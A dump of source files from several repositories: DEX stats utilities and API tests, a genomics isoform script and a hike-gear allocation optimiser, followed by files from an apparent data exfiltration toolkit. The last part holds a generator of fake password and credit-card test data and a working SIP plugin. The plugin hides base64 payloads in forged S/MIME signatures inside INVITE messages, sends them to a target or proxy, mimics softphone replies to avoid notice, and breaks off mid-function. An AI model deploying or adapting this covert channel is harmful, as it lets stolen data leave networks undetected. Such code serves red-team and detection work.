repo_name stringlengths 6 97 | path stringlengths 3 341 | text stringlengths 8 1.02M |
|---|---|---|
smk762/dex_stats_pymongo | dex_stats/utils/utils.py | <reponame>smk762/dex_stats_pymongo<gh_stars>1-10
from functools import wraps
from decimal import Decimal
from time import time
import numpy as np
def measure(func):
@wraps(func)
def _time_it(*args, **kwargs):
start = int(round(time() * 1000))
try:
return func(*args, **kwargs)
finally:
end_ = int(round(time() * 1000)) - start
print(f"Total execution time for {func.__name__} : {end_ if end_ > 0 else 0} ms")
return _time_it
def remove_exponent(d):
return d.quantize(Decimal(1)) if d == d.to_integral() else d.normalize()
def enforce_float( num : [float, int, str] ) -> float:
return "{:.10f}".format(num)
def sort_orders(orders, reverse=False):
return sorted(orders, key=lambda order: order[0], reverse=reverse)
def prettify_orders(orders):
return [ [enforce_float(order[0]), enforce_float(order[1])]
for order
in orders ]
def numforce_float(num) -> float:
return enforce_float(np.format_float_positional(num, unique=True, trim='-', precision=10)) |
smk762/dex_stats_pymongo | qa/conftest.py | import pytest
import json
@pytest.fixture(scope='session')
def test_params():
with open('endpointconf.json', 'r') as f:
params_dict = json.load(f)
return params_dict
|
smk762/dex_stats_pymongo | qa/test_api.py | <filename>qa/test_api.py
import pytest
import requests
from pytest_utils.utils import validate_template
class TestAPI:
def test_ticker_call(self, test_params):
schema_ticker = {
'type': 'array',
'items': {
'type': 'object',
'propertyNames': {'pattern': r"\A[A-Z0-9]+_[A-Z0-9]+\Z"},
'patternProperties': {"": {
'type': 'object',
'properties': {
'base_volume': {'type': ['number', 'integer']},
'last_price': {'type': ['string', 'integer']},
'quote_volume': {'type': ['number', 'integer']}
}}
}
}
}
header = {'accept': 'application/json'}
url = ("http://" + test_params.get('ip') + ':' +
test_params.get('port') + "/api/v1/ticker")
res = requests.get(url, headers=header)
assert validate_template(res.json(), schema_ticker)
def test_summary_call(self, test_params):
schema_summary = {
'type': 'array',
'items': {
'type': 'object',
'properties': {
'base_currency': {'type': 'string',
'pattern': r"\A[A-Z0-9]+\Z"},
'base_volume_24h': {'type': ['integer', 'number']},
'highest_bid': {'type': 'string'},
'highest_price_24h': {'type': 'string'},
'last_price': {'type': 'string'},
'last_trade_time': {'type': ['integer', 'number']},
'lowest_ask': {'type': 'string'},
'lowest_price_24h': {'type': 'string'},
'price_change_percent_24h': {'type': 'string'},
'quote_currency': {'type': 'string',
'pattern': r"\A[A-Z0-9]+\Z"},
'quote_volume_24h': {'type': ['integer', 'number']},
'trading_pair': {'type': 'string',
'pattern': r"\A[A-Z0-9]+_[A-Z0-9]+\Z"}
}
}
}
header = {'accept': 'application/json'}
url = ("http://" + test_params.get('ip') + ':' +
test_params.get('port') + "/api/v1/summary")
res = requests.get(url, headers=header)
assert validate_template(res.json(), schema_summary)
def test_orderbook_call(self, test_params):
schema_orderbook = {
'type': 'object',
'propertyNames': {'pattern': r"\A[A-Z0-9]+_[A-Z0-9]+\Z"},
'patternProperties': {"": {
'type': 'object',
'properties': {
'asks': {
'type': 'array',
'items': {
'type': 'array',
'items': {
'type': 'string',
'pattern': r"\A[0-9]+.[0-9]+|[0-9]+\Z"
},
'additionalItems': False,
'minItems': 2,
'maxItems': 2
}
},
'bids': {
'type': 'array',
'items': {
'type': 'array',
'items': {
'type': 'string',
'pattern': r"\A[0-9]+.[0-9]+|[0-9]+\Z"
},
'additionalItems': False,
'minItems': 2,
'maxItems': 2
}
},
'timestamp': {
'type': 'integer'
}
}
}
}
}
pair = test_params.get('base') + '_' + test_params.get('rel')
header = {'accept': 'application/json'}
url = ("http://" + test_params.get('ip') + ':' +
test_params.get('port') + "/api/v1/orderbook/" + pair)
res = requests.get(url, headers=header)
assert validate_template(res.json(), schema_orderbook)
def test_trades_call(self, test_params):
schema_trades = {
'type': 'object',
'propertyNames': {'pattern': r"\A[A-Z0-9]+_[A-Z0-9]+\Z"},
'patternProperties': {"": {
'type': 'array',
'items': {
'type': 'object',
'properties': {
'base_volume': {'type': ['integer', 'number']},
'price': {
'type': 'string',
'pattern': r"\A[0-9]+.[0-9]+\Z"
},
'quote_volume': {'type': ['integer', 'number']},
'timestamp': {'type': 'integer'},
'trade_id': {
'type': 'string',
'pattern': r"\A[0-9a-z]{8}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{4}-[0-9a-z]{12}\Z"
},
'type': {
'type': 'string',
'pattern': r"\ABuy|Sell|buy|sell\Z"
}
}
}
}
}
}
pair = test_params.get('base') + '_' + test_params.get('rel')
header = {'accept': 'application/json'}
url = ("http://" + test_params.get('ip') + ':' +
test_params.get('port') + "/api/v1/trades/" + pair)
res = requests.get(url, headers=header)
assert validate_template(res.json(), schema_trades)
|
bgruening/funannotate | funannotate/utilities/get_longest_isoform.py | <reponame>bgruening/funannotate
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys, re, os, gzip, argparse
from Bio import SeqIO
def main(inargs):
# setup menu with argparse
class MyFormatter(argparse.ArgumentDefaultsHelpFormatter):
def __init__(self, prog):
super(MyFormatter, self).__init__(prog, max_help_position=48)
parser = argparse.ArgumentParser(prog='get_longest_isoform',
description='''Script to extract longest isoform of protein or transcript file from funannotate or where gene is tagged in header.''',
epilog="""Written by <NAME> (2022) @hyphaltip""",
formatter_class=MyFormatter)
parser.add_argument('-i', '--input', required=True,
help='fasta formatted transcript or protein file')
parser.add_argument('-o', '--output', help='Output basename')
parser.add_argument('-v', '--verbose', help='Extra verbose output',dest='verbose', default=False, action='store_true')
args = parser.parse_args(inargs)
genes = {}
if not args.output:
args.output = args.input + ".longest"
transmatch = re.compile(r'\-T\d+$')
genematch = re.compile(r'gene[:=](\S+)')
recCount = 0
handle = args.input
if args.input.endswith('.gz'):
handle = gzip.open(args.input,"rt")
for rec in SeqIO.parse(handle, "fasta"):
id = rec.id
description = rec.description
geneid = id
m = transmatch.search(id)
if m:
geneid = description.split()[1]
else:
m = genematch.search(description)
if m:
geneid = m.group(1)
if geneid == id:
if args.verbose:
print("Warning: could not parse gene name from header '{}' '{}'".format(id,description))
if geneid not in genes or len(rec) > len(genes[geneid]):
genes[geneid] = rec
recCount += 1
print("{} genes and {} total sequences (isoforms) seen".format(len(genes),recCount))
SeqIO.write(genes.values(),args.output,'fasta')
if __name__ == "__main__":
main(sys.argv[1:])
|
sitandr/hike-dispenser | data_reader.py | import data_classes
import os
from tools import *
import help_parser
def read_data(args):
def default_optimize_values():
return {args.v_name_default: data_classes.Value(args.v_name_default)}
to_optimize_values = {}
if args.people_and_things_file is not None:
# "classic", simple way
try: # catch errors of file reading
people_file, things_file = args.people_and_things_file
assert os.path.isfile(people_file) and os.path.isfile(things_file)
except AssertionError:
raise AttributeError('Invalid file')
try:
people = {}
data_classes.Value.pain = args.pain_multiply
to_optimize_values = default_optimize_values()
for line in open(people_file, encoding = 'utf-8'):
if not len(line) or line[0] == '#':
continue
current = line.strip().split()
if not len(current):
continue
if args.auto_complete: current[1:] = auto_complete(current[1:], [10, 10])
people[current[0]] = data_classes.Person()
people[current[0]].name = current[0]
people[current[0]].values_optimal = {args.v_name_default: float(current[1])}
people[current[0]].values_sensitivity = {args.v_name_default: float(current[2])}
things = []
for line in open(things_file, encoding = 'utf-8'):
if not len(line) or line[0] == '#':
continue
current = line.strip().split()
if not len(current):
continue
if args.auto_complete: current[1:] = auto_complete(current[1:], [1.0, None, 0.0])
things.append(data_classes.Thing())
things[-1].name = current[0]
things[-1].values = {args.v_name_default: float(current[1])}
things[-1].owner = (None if current[2] == 'None' else current[2])
things[-1].moral = float(current[3])
except IndexError:
raise SyntaxError('Invalid file input length'
+ ('. Try -a option to automaticly add insufficient values.' if not args.auto_complete else '') +
f' Error in line:\n{line}')
except (TypeError, ValueError):
raise SyntaxError(f'Invalid file input. Error in line:\n{line}')
elif args.yaml_file is not None:
assert os.path.isfile(args.yaml_file)
import yaml
data = yaml.load(open(args.yaml_file, encoding = 'utf-8'), Loader = UniqueKeyLoader)
people = {}
if 'config' in data:
for attribute in data['config']:
if help_parser.is_default(args, attribute): # command (args) has more priority
setattr(args, attribute, data['config'][attribute])
data_classes.Value.pain = args.pain_multiply
data_classes.Person.inaccessibility = args.inaccessability_default
if 'optimize' in data:
for v_name in data['optimize'].keys():
v = data_classes.Value(v_name)
if 'pain' in data['optimize'][v_name]: v.pain = data['optimize'][v_name]['pain']
to_optimize_values[v_name] = v
else:
to_optimize_values[v_name] = default_optimize_values()
for person_name in data['people']:
people[person_name] = data_classes.Person()
people[person_name].name = person_name
if 'inacs' in data['people'][person_name]:
people[person_name].inaccessability = data['people'][person_name]['inacs']
for v in to_optimize_values:
current_p = data['people'][person_name]
people[person_name].values_optimal[v] = (current_p[v]['opt']
if (v in current_p and 'opt' in current_p[v]) else
args.opt_default)
people[person_name].values_sensitivity[v] = (current_p[v]['sens']
if (v in current_p and 'sens' in current_p[v]) else
args.sens_default)
things = []
for thing_name in data['things']:
things.append(data_classes.Thing())
things[-1].name = thing_name
d_thing = data['things'][thing_name]
if 'owr' in d_thing:
things[-1].owner = d_thing['owr']
things[-1].moral = d_thing['mrl']
things[-1].values = {v: d_thing[v] if v in d_thing else 0 for v in to_optimize_values}
else:
raise AttributeError('No input data provided')
return people, things, to_optimize_values
|
sitandr/hike-dispenser | tools.py | <gh_stars>1-10
# modificated funcs from StackOverFlow
import math
try:
import yaml
class UniqueKeyLoader(yaml.SafeLoader):
def construct_mapping(self, node, deep=False):
mapping = []
for key_node, value_node in node.value:
key = self.construct_object(key_node, deep=deep)
if key in mapping:
raise SyntaxError(f'"{key}" is a duplicated key. Please try to make it different.')
mapping.append(key)
return super().construct_mapping(node, deep)
except ImportError:
print('WARINIG: PyYAML lib not detected, using yaml files is impossible')
def print_progress_bar (iteration, total, prefix = '', suffix = '',
decimals = 1, length = 50, fill = '█', print_end = "\r"):
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
length - Optional : character length of bar (Int)
fill - Optional : bar fill character (Str)
printEnd - Optional : end character (e.g. "\r", "\r\n") (Str)
"""
# modified function from StackOverflow
percent = ("{0:." + str(decimals) + "f}").format(100 * (iteration / float(total)))
filled_length = length * iteration / total
extra, real_length = math.modf(filled_length)
real_length = int(real_length)
edge = ['-', '░', '▒', '▓'][int(extra*4)] if (length - real_length - 1 >= 0) else ''
bar = fill * real_length + edge + '-' * (length - real_length - 1)
print(f'{prefix} |{bar}| {percent}% {suffix}', end = print_end)
# Print New Line on Complete
if iteration == total:
print(' '*length*2, end = '\r')
def auto_complete(array, default_values):
"Non-clear function, changes array"
array.extend(default_values[len(array):])
return array
|
sitandr/hike-dispenser | data_classes.py | <reponame>sitandr/hike-dispenser
class Value:
name = '<undefined value name>'
pain = None
def __init__(self, name):
self.name = name
def __repr__(self):
return self.name
class Person:
name = '<undefined person name>'
inaccessibility = 0
def __init__(self):
self.values_optimal = {}
self.values_sensitivity = {}
def __repr__(self):
return ((self.name) + ' optimal ' + ' '.join([v + ': ' + str(self.values_optimal[v])
for v in self.values_optimal])
+ ' sens ' + ' '.join([v + ': ' + str(self.values_sensitivity[v])
for v in self.values_sensitivity]))
class Thing:
name = '<undefined thing name>'
values = {}
owner = None
moral = 0
def __repr__(self):
return (self.name + ' ' +
' '.join([v + ': ' + str(self.values[v])
for v in self.values]) +
f' owned by {self.owner} with moral debuff {self.moral}')
|
sitandr/hike-dispenser | help_parser.py | <filename>help_parser.py
import argparse
parser = argparse.ArgumentParser(description='This program dispenses things to people (mininmizing total pain) \
using annealing. As input it takes file with people descriptions (for each in each line there is name, \
optimal_weight and weight_sensevity (number of times pain increases when mass increased by optimal_mass)\
in this order, separated by spaces/tabs) and things descriptions \
(similarly, in each line there is name, weight, owner and number of pain he gains from giving it to anybody else \
in this order separated by spaces/tabs). Default values are designed to <10 people and <50 things, so if your \
values are larger, it\'s recommended to change the default values. This means increasing number of iterations \
to get better result. If you do so, it\'s also recommended to increase gradient proportionally. However, the situation \
may be different, so it\'s best to modify according to circumstances.')
parser.add_argument('-t', '--people_and_things_files', dest = 'people_and_things_file', nargs = 2, type = str,
help='Input files with people and thing data,\
used with things file instead of yaml')
parser.add_argument('-y', '--yaml_file', dest = 'yaml_file', type = str, help='Input file with all data in yaml')
parser.add_argument('-o', '--output_file', dest = 'output_file', default = None,
help='Output file; if not specified, stdout is used')
parser.add_argument('-w', '--print_own', dest = 'print_own', action='store_true',
help='Print just current owners; useful for an overview')
parser.add_argument('-m', '--meeting_print', dest = 'meeting_print', action='store_true',
help='Print all transfer ways')
parser.add_argument('-i', '--inaccessability_default', dest = 'inaccessability_default', type=float, default = 0,
help='Default inaccessability; default is 0; adding any inaccessability decreases speed at ~20%%')
parser.add_argument('-l', '--print_log', dest = 'print_log', action='store_true',
help='Print total pain and temperature instead of progress bars')
parser.add_argument('-d', '--disable_progress_info', dest = 'disable_progress_info', action='store_true',
help='No progress info')
parser.add_argument('-u', '--update_freq', dest = 'update_freq', type=int, default = 2_000,
help='Number of iterations between updating bar/log; default is 1_000')
parser.add_argument('-a', '--auto_complete', dest = 'auto_complete', action='store_true',
help='Allows not full completed TEXT data files; people are auto-completed with 10 optimal_weight \
and 10 sensevity; things have 1 kg mass and don\'t belong to anybody.')
parser.add_argument('-E', '--epoch_number', dest = 'epoch_number', type=int, default = 3,
help='Default number of general attempts; default is 3')
parser.add_argument('-I', '--iteration_number', dest = 'iteration_number', type=int, default = 300_000,
help='Default number of iteration in each attempt; if not specified, equals to 300_000')
parser.add_argument('-G', '--gradient', dest = 'gradient', type=float, default = 100_000,
help='Number of iterations it takes to decrease temperature in 10 times; default is 100_000')
parser.add_argument('-T', '--start_temperature', dest = 'start_temperature', type=float, default = 50,
help='Start temperature; default is 50 (pains)')
parser.add_argument('--pain_multiply', dest = 'pain_multiply', type=float, default = 10,
help='Default pain (at optimal weight); default is 10')
parser.add_argument('--opt_default', dest = 'opt_default', type=float, default = 10,
help='Default optimal value; default is 10')
parser.add_argument('--sens_default', dest = 'sens_default', type=float, default = 10,
help='Default optimal value; default is 10')
parser.add_argument('--v_name_default', dest = 'v_name_default', type=str, default = 'v',
help='Default value name; default is «v»')
def parse():
# parse part
return parser.parse_args()
def is_default(args, attribute):
return getattr(args, attribute) == parser.get_default(attribute)
|
sitandr/hike-dispenser | dispenser.py | import random
import help_parser
import data_reader
from tools import print_progress_bar
import time
import optimize
from optimize import optimized_rand_move, generate_sequence, generate_transfer_from_seqence
args = help_parser.parse() # parse all given flags
people, things, to_optimize_values = data_reader.read_data(args)
enable_inacs = any([people[p].inaccessibility for p in people])
# inaccessibility, slightly decreases speed, so should be tracked
names = list(people.keys())
try:
for thing in things:
assert thing.owner in names or thing.owner == None
except AssertionError:
raise SyntaxError(f'Owner of thing ({thing}) does not exist.')
def print_meet(transfer):
s = ''
for person_name in names:
s += person_name + ' :\n'
for to_p in names:
if to_p == person_name:
continue
if transfer[person_name, to_p]:
s += f'\t-> {to_p}: ' + ' '.join([t.name for t in transfer[person_name, to_p]]) + '\n'
if transfer[to_p, person_name]:
s += f'\t{to_p} ->: ' + ' '.join([t.name for t in transfer[to_p, person_name]]) + '\n'
return s
def print_haul(seq):
s = ''
for person_name in seq:
things = seq[person_name]
s1 = '{:<15}'.format(person_name)
s2 = '{:<80}'.format(', '.join(sorted([thing.name for thing in things])))
s3 = ' '
for value_name in to_optimize_values:
sum_mass = sum([thing.values[value_name] for thing in things])
if value_name != args.v_name_default:
s3 += value_name
s3 += f' {round(sum_mass, 5)}/{people[person_name].values_optimal[value_name]} '
s += s1 + ':' + s2 + s3 + '\n'
return s
# create "out" func that would work as file/print output
if args.output_file:
all_text = ''
def out(t): global all_text; all_text += t
else:
out = print
optimize.names = names
optimize.people = people
optimize.things = things
optimize.to_optimize_values = to_optimize_values
optimize.enable_inacs = enable_inacs
if not args.print_own:
for attempt in range(args.epoch_number):
sequence = generate_sequence()
transfer = generate_transfer_from_seqence(sequence)
if not args.disable_progress_info:
print(f'Epoch {attempt + 1}/{args.epoch_number}')
for i in range(args.iteration_number):
T = args.start_temperature*10**(-i/args.gradient)
optimized_rand_move(transfer, sequence, T*random.random())
if not i%args.update_freq:
if args.print_log:
print(round(count_pain(sequence), 2), round(T, 3))
elif not args.disable_progress_info:
print_progress_bar(i, args.iteration_number, prefix = 'Progress:',
suffix = 'Complete')
if not args.disable_progress_info and not args.print_log:
print_progress_bar(args.iteration_number, args.iteration_number)
text = (f'\nAttempt {attempt + 1}. Total pain: {optimize.count_pain(sequence)}. Full info:\n'
+ print_haul(sequence))
if args.meeting_print:
text += '\n' + print_meet(generate_transfer_from_seqence(sequence))
out(text)
else:
# print just owners
start_sequence = {name: [] for name in names}
for thing in things:
name = thing.owner
if name is None:
continue
start_sequence[name].append(thing)
out(print_haul(start_sequence))
if args.output_file:
open(args.output_file, 'w', encoding = 'utf-8').write(all_text)
|
sitandr/hike-dispenser | optimize.py | import random
names = None
things = None
to_optimize_values = None
people = None
enable_inacs = False
def generate_transfer_from_seqence(seq):
# very slow
all_transfer = {(n1, n2): [] for n1 in names for n2 in names}
# what FIRST GIVES (and second takes)
for to in seq:
for thing in seq[to]:
if thing.owner is not None and thing.owner != to:
all_transfer[thing.owner, to].append(thing) # owner GIVES
return all_transfer
def generate_sequence():
sequence = {name: [] for name in names}
for thing in things:
name = random.choice(names)
sequence[name].append(thing)
return sequence
def personal_pain(things, person_name):
# special function is needed to optimize calculating pain from random move
pain = sum(thing.moral for thing in things if thing.owner != person_name)
for value_name in to_optimize_values:
sum_mass = sum([thing.values[value_name] for thing in things])
optimal = people[person_name].values_optimal[value_name]
sens = people[person_name].values_sensitivity[value_name]
pain += to_optimize_values[value_name].pain * sens ** (sum_mass/optimal - 1)
# TODO: pain_multiply <- file
return pain
def count_pain(seq):
# needed only for output; optimizing this is senselessly
pain = 0
for person_name in seq:
pain += personal_pain(seq[person_name], person_name)
return pain
def transfer_move(transfer, thing, from_, to_):
if thing.owner is None: return 0
add_energy = 0
if thing.owner != from_:
transfer[thing.owner, from_].remove(thing)
if not (transfer[thing.owner, from_] or transfer[from_, thing.owner]): # removed all, transfer is deleted -> good
add_energy -= people[from_].inaccessibility + people[thing.owner].inaccessibility
if thing.owner != to_:
if not (transfer[thing.owner, to_] or transfer[to_, thing.owner]): # before addition was empty; transfer created -> bad
add_energy += people[to_].inaccessibility + people[thing.owner].inaccessibility
transfer[thing.owner, to_].append(thing)
return add_energy
def optimized_rand_move(transfer, seq, extra_energy):
from_p, to_p = random.sample(seq.keys(), 2)
things_from, things_to = seq[from_p], seq[to_p]
if not len(things_from):
# interrupt if person we want to take from hasn't things at all
return
# to count energy difference should be known only the energy that changes
start_energy = (personal_pain(things_from, from_p) +
personal_pain(things_to, to_p))
thing_from = random.randrange(len(things_from))
add_energy = 0
if random.random() < 0.5 and len(things_to):
# swap
thing_to = random.randrange(len(things_to))
if enable_inacs:
add_energy += transfer_move(transfer, things_from[thing_from], from_p, to_p)
add_energy += transfer_move(transfer, things_to[thing_to], to_p, from_p)
things_from[thing_from], things_to[thing_to] = (things_to[thing_to],
things_from[thing_from])
def reverse():
things_from[thing_from], things_to[thing_to] = (things_to[thing_to],
things_from[thing_from])
if enable_inacs:
transfer_move(transfer, things_from[thing_from], to_p, from_p)
transfer_move(transfer, things_to[thing_to], from_p, to_p)
else:
# move
thing = things_from.pop(thing_from)
things_to.append(thing)
if enable_inacs: add_energy += transfer_move(transfer, thing, from_p, to_p)
def reverse():
if enable_inacs: transfer_move(transfer, thing, to_p, from_p)
things_from.append(things_to.pop())
final_energy = (personal_pain(things_from, from_p) +
personal_pain(things_to, to_p))
if final_energy + extra_energy + add_energy > start_energy:
reverse()
|
NickFleece/DET | etc/data_processing.py | <filename>etc/data_processing.py
import csv
import random
data = {
"passwords":[],
"cc_numbers":[]
}
print("Getting password values")
#get the passwords
passwords = []
with open('pwd.csv') as csvfile:
spamreader = csv.reader(csvfile)
for row in spamreader:
data["passwords"].append([row[0]])
print("Generating CC values")
#generate some cc numbers
for i in range(0, 500000):
cc_number = [str(random.randint(0,9)) for _ in range(16)]
cc_cvv = [str(random.randint(0,9)) for _ in range(16)]
cc_exp = [str(random.randint(0,9)) for _ in range(4)]
cc = "".join(cc_number) + "/" + "".join(cc_cvv) + "/" + "".join(cc_exp)
data["cc_numbers"].append([cc])
print("Final randomization and save")
final_data = []
for key in data.keys():
print("Adding " + key + " size:" + str(len(data[key])))
for i in data[key]:
final_data.append(i)
random.shuffle(final_data)
with open('exfiltration_data.csv', 'wb') as file:
writer = csv.writer(file, delimiter=',')
writer.writerows(final_data) |
NickFleece/DET | plugins/sip.py | #!/usr/bin/env python
#inspired from: https://books.google.fr/books?id=cHOmCwAAQBAJ&pg=PA747&lpg=PA747&dq=sdp+smime&source=bl&ots=34LYW5iJyc&sig=4a1szVXKMDtqQWUb0K2gM29AgL8&hl=fr&sa=X&ved=0ahUKEwjbm5Tf1JzTAhUGfxoKHX-UCQUQ6AEIVTAG#v=onepage&q=sdp%20smime&f=false
from __future__ import print_function
from dpkt import sip
import socket
import string
import random
import base64
import re
from random import choice
import traceback
config = None
app_exfiltrate = None
#Ideally replace with real employee names
names = ('alice', 'bob', 'eve', 'kim', 'lorrie', 'ben')
caller, callee = random.sample(names, 2)
#proxy = "freephonie.net" #Might as well be internal PBX
#domain = 'e.corp'
class UserAgent:
def __init__(self, alias, ip, port=None, user_agent=None):
self.alias = alias
self.ip = ip
self.port = port
self.user_agent = 'Linphone/3.6.1 (eXosip2/4.1.0)'
self.tag = ''.join(random.sample(string.digits, 10))
class SIPDialog:
def __init__(self, uac=None, uas=None, proxy=None):
self.call_id = ''.join(random.sample(string.digits, 8))
self.uac = uac
self.uas = uas
self.branch = 'z9hG4bK' + ''.join(random.sample(string.digits, 10))
self.proxy = proxy
self.subject = "Phone call"
def init_from_request(self, req):
self.call_id = req.headers['call-id']
parser = re.compile('<sip:(.*)@(.*)>;tag=(.*)')
[(s_alias, s_ip, tag)] = re.findall(parser, req.headers['from'])
parser = re.compile('SIP\/2\.0\/UDP (.*):(\d*)(?:\;rport.*)?\;branch=(.*)')
[(proxy, s_port, branch)] = re.findall(parser, req.headers['via'])
parser = re.compile('<sip:(.*)@(.*)>')
[(c_alias, c_ip)] = re.findall(parser, req.headers['to'])
user_agent = req.headers['user-agent']
self.tag = tag
self.branch = branch
self.uac = UserAgent(c_alias, c_ip)
self.uas = UserAgent(s_alias, s_ip, port=s_port, user_agent=user_agent)
self.proxy = proxy
def invite(self, uac, uas, payload):
#Call-ID magic identifier
self.call_id = self.call_id[:3] + "42" + self.call_id[5:]
#Branch magic identifier
self.branch = self.branch[:11] + "42" + self.branch[13:]
self.uac = uac
self.uas = uas
self.proxy = self.proxy or '127.0.0.1' #keep calm & blame misconfiguration
packet = sip.Request()
#forge headers
packet.uri = 'sip:' + self.uas.alias + '@'+ self.uas.ip
packet.headers['Via'] = 'SIP/2.0/UDP {}:{};branch={}'.format(self.proxy, self.uac.port, self.branch)
packet.headers['Max-Forwards'] = 70
packet.headers['CSeq'] = '20 ' + packet.method
packet.headers['From'] = '{} <sip:{}@{}>;tag={}'.format(self.uac.alias.capitalize(), self.uac.alias, self.uac.ip, self.uac.tag)
packet.headers['To'] = '{} <sip:{}@{}>'.format(self.uas.alias.capitalize(), self.uas.alias, self.uas.ip)
packet.headers['Contact'] = '<sip:{}@{}>'.format(self.uac.alias, self.uac.ip)
packet.headers['Call-ID'] = self.call_id
packet.headers['User-Agent'] = self.uac.user_agent
packet.headers['Subject'] = self.subject
packet.headers['Content-Type'] = 'application/sdp'
packet.headers['Allow'] = 'INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, NOTIFY, MESSAGE, SUBSCRIBE, INFO'
#forge the sdp message
sdp_content = "v=0\r\n"
sdp_content += "o=" + self.uac.alias + " 99 939 IN IP4 " + self.uac.ip + "\r\n"
sdp_content += "s=Talk\r\n"
sdp_content += "c=IN IP4 " + self.uac.ip + "\r\n"
sdp_content += "t=0 0\r\n"
sdp_content += "m=audio 7078 RTP/AVP 124 111 110 0 8 101\r\n"
sdp_content += "a=rtpmap:124 opus/48000\r\n"
sdp_content += "a=fmtp:124 useinbandfec=1; usedtx=1\r\n"
sdp_content += "a=rtpmap:111 speex/16000\r\n"
sdp_content += "a=fmtp:111 vbr=on\r\n"
sdp_content += "a=rtpmap:110 speex/8000\r\n"
sdp_content += "a=fmtp:110 vbr=on\r\n"
sdp_content += "a=rtpmap:101 telephone-event/8000\r\n"
sdp_content += "a=fmtp:101 0-11\r\n"
sdp_content += "m=video 9078 RTP/AVP 103 99\r\n"
sdp_content += "a=rtpmap:103 VP8/90000\r\n"
sdp_content += "a=rtpmap:99 MP4V-ES/90000\r\n"
sdp_content += "a=fmtp:99 profile-level-id=3\r\n"
#forge sdp header
sdp_hdr = "Content-Type: message/sip\r\n"
sdp_hdr += "Content-Length: " + str(len(sdp_content)) + '\r\n'
sdp_hdr += "INVITE sip:{}@{} SIP/2.0".format(self.uas.alias, self.uas.ip)
sdp_hdr += packet.pack_hdr()
sdp_hdr += "\r\n"
#forge the false signature
sig = 'Content-Type: application/x-pkcs7-signature; name="smime.p7s"\r\n'
sig += 'Content-Transfer-Encoding: base64\r\n'
sig += 'Content-Disposition: attachment; filename="smime.p7s"; handling=required\r\n'
sig += base64.b64encode(payload)
#forge sip body
boundary = ''.join(random.sample(string.digits + string.ascii_letters, 20))
packet.body = '--' + boundary + '\r\n'
packet.body += sdp_hdr
packet.body += sdp_content + '\r\n'
packet.body += '--' + boundary + '\r\n'
packet.body += sig + '\r\n'
packet.body += '--' + boundary + '--'
#replace sip header content-type with multipart/signed
packet.headers['Content-Type'] = 'multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary=' + boundary
#Update Content-Length
packet.headers['Content-Length'] = str(len(packet.body))
return packet
def trying(self, invite):
packet = sip.Response()
packet.status = '100'
packet.reason = 'Trying'
packet.headers['Via'] = invite.headers['via']
packet.headers['From'] = invite.headers['from']
packet.headers['To'] = invite.headers['to']
packet.headers['Call-ID'] = invite.headers['call-id']
packet.headers['CSeq'] = invite.headers['cseq']
packet.headers['User-Agent'] = self.uac.user_agent
packet.headers['Content-Length'] = '0'
return packet
def ringing(self, invite):
packet = sip.Response()
packet.status = '180'
packet.reason = 'Ringing'
packet.headers['Via'] = invite.headers['via']
packet.headers['From'] = invite.headers['from']
packet.headers['To'] = invite.headers['to'] + ';tag={}'.format(self.uac.tag)
packet.headers['Call-ID'] = invite.headers['call-id']
packet.headers['CSeq'] = invite.headers['cseq']
packet.headers['Contact'] = '<sip:{}@{}>'.format(self.uac.alias, self.uac.ip)
packet.headers['User-Agent'] = self.uac.user_agent
packet.headers['Content-Length'] = '0'
return packet
def decline(self, invite):
packet = sip.Response()
packet.status = '603'
packet.reason = 'Decline'
packet.headers['From'] = invite.headers['from']
packet.headers['To'] = invite.headers['to'] + ';tag={}'.format(self.uac.tag)
packet.headers['Call-ID'] = invite.headers['call-id']
packet.headers['CSeq'] = invite.headers['cseq']
packet.headers['User-Agent'] = self.uac.user_agent
packet.headers['Content-Length'] = '0'
return packet
def ack(self, message):
packet = sip.Request()
packet.method = 'ACK'
packet.uri = 'sip:{}@{}'.format(self.uas.alias, self.uas.ip)
packet.headers['Via'] = message.headers['via']
packet.headers['From'] = message.headers['from']
packet.headers['To'] = message.headers['to']
packet.headers['Call-ID'] = message.headers['call-id']
packet.headers['CSeq'] = '20 ACK'
packet.headers['Content-Length'] = '0'
return packet
def listen():
app_exfiltrate.log_message('info', "[sip] Listening for incoming calls")
port = config['port']
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('', port))
while True:
data, addr = sock.recvfrom(65535)
try:
req = sip.Request()
req.unpack(data)
if req.method == 'INVITE':
dialog = SIPDialog()
dialog.init_from_request(req)
#Simulate legit softphone responses
trying = dialog.trying(req)
sock.sendto(trying.pack(), addr)
ringing = dialog.ringing(req)
sock.sendto(ringing.pack(), addr)
decline = dialog.decline(req)
sock.sendto(decline.pack(), addr)
#Check if the request is part of exfiltration job
if dialog.branch[11:13] == "42" and dialog.call_id[3:5] == "42":
parser = re.compile('boundary=(.*)')
[boundary] = re.findall(parser, req.headers['content-type'])
#Hackish payload isolation
payload = req.body.split('--'+boundary)[-2].split('\r\n')[-2]
app_exfiltrate.log_message('info', "[sip] Received {0} bytes from {1}".format(len(payload), addr[0]))
app_exfiltrate.retrieve_data(base64.b64decode(payload))
except Exception as e:
print(traceback.format_exc())
print('exception: ' + repr(e))
pass
def send(data):
if config.has_key('proxies') and config['proxies'] != [""]:
targets = [config['target']] + config['proxies']
target = choice(targets)
else:
target = config['target']
port = config['port']
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('', port))
dialog = SIPDialog()
laddr = socket.gethostbyname(socket.getfqdn())
uac = UserAgent(caller, laddr, port=port)
uas = UserAgent(callee, target, port=port)
invite = dialog.invite(uac, uas, data)
app_exfiltrate.log_message('info', "[sip] Sending {0} bytes to {1}".format(len(data), target))
sock.sendto(invite.pack(), (target, port))
while True:
try:
recv_data, addr = sock.recvfrom(65535)
response = sip.Response()
response.unpack(recv_data)
if response.reason == 'Decline':
ack = dialog.ack(response)
sock.sendto(ack.pack(), (target, port))
sock.close()
break
else:
continue
except:
pass
break
def proxy():
app_exfiltrate.log_message('info', "[proxy] [sip] Starting SIP proxy")
target = config['target']
port = config['port']
sender = ""
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind(('', port))
while True:
data, addr = sock.recvfrom(65535)
if addr[0] != target:
sender = addr[0]
try:
